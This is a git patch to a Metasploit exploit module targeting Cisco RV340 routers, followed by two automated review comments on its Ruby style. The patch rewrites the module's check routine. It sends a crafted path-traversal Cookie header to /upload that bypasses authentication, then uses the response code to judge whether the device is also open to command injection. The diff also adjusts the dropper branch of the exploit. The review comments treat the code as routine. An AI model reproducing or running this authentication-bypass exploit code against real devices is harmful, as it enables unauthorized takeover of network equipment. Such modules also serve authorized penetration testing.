From 79b1801a4f5300328867589f84a4fd577b4ef4a6 Mon Sep 17 00:00:00 2001
From: Stephen Wildow
Date: Sat, 11 Feb 2023 17:43:33 -0500
Subject: [PATCH] Rewrote check method to only abuse authentication bypass. Added additional status checks.
---
 .../exploits/linux/http/cisco_rv340_lan.rb | 40 +++++++++++++------
 1 file changed, 27 insertions(+), 13 deletions(-)
diff --git a/modules/exploits/linux/http/cisco_rv340_lan.rb b/modules/exploits/linux/http/cisco_rv340_lan.rb
index 42ee5aae75..9336dde7a8 100644
--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote ) end + # sessionid utilized later needs to be set to length + # of 16 or exploit will fail. Tested with lengths + # 14-17 + def generate_session_id + return Rex::Text.rand_text_alphanumeric(16) + end + def check - # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce - # Test to see if router is responding and possibly vulnerable - res = send_exploit('id') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/upload', + 'headers' => { + 'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id + } + }, 10) - return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil? - - # Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation - return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403 - - # Vulnerable versions will respond with 301 Moved Permanently in body of response - if res.body.include?('301 Moved Permanently') - return CheckCode::Appears('The device responded to exploitation with a 200 OK.') + # A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file + # creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request. + # The firmware containing this authentication bypass also contains the command injection vulnerability that will be + # abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden. + if res.nil? + return CheckCode::Unknown('The device did not respond to request packet.') + elsif !res.nil? && res.code == 405 + return CheckCode::Appears('The device is vulnerable to authentication bypass. 
Likely also vulnerable to command injection.') + elsif res.code == 403 + return CheckCode::Safe('The device is not vulnerable to exploitation.') + else # Catch-all + return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.') end - - CheckCode::Safe('The target did not respond with an expected payload.') end def execute_command(cmd, _opts = {}) @@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote end if target['Type'] == :linux_dropper + fail_with(Failure::Unreachable, 'The target did not respond') unless res fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 begin body_json = res.get_json_document
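Review bot: The `!res.nil? &&` guard in the 405 branch of `check` is dead code — the preceding `if res.nil?` branch already returns, so `elsif res.code == 405` is sufficient and matches the shape of the 403 branch below it. The catch-all message also carries a typo: `'The target responded in such a way that exploitation in unknown and unlikely.'` should read `exploitation is unknown and unlikely`, and the comment `The router return a status code 405` wants `returns`. The explicit `return` in `generate_session_id` is unnecessary in Ruby, since the last expression is the method's value, and the `'Cookie'` value would read more idiomatically with interpolation, `"sessionid =../../www/index.html; sessionid=#{generate_session_id}"`, than with `+` concatenation. Finally, the four-line comment above the `if` chain documents the expected 405/403 responses but says nothing about the timeout argument `10` passed to `send_request_cgi`; a short trailing comment such as `# 10s timeout` would make that literal self-explanatory.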
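Review bot: With the new `fail_with(Failure::Unreachable, ...) unless res` line in place, the safe-navigation operator on the line after it is redundant, because execution never reaches it with a nil `res`; `unless res.code == 200` states the intent more directly and avoids suggesting to a reader that `res` may still be nil at that point. The body of `execute_command` begins and ends outside this hunk, so whether `res` can be nil on the non-`:linux_dropper` path is not visible here and may deserve the same guard.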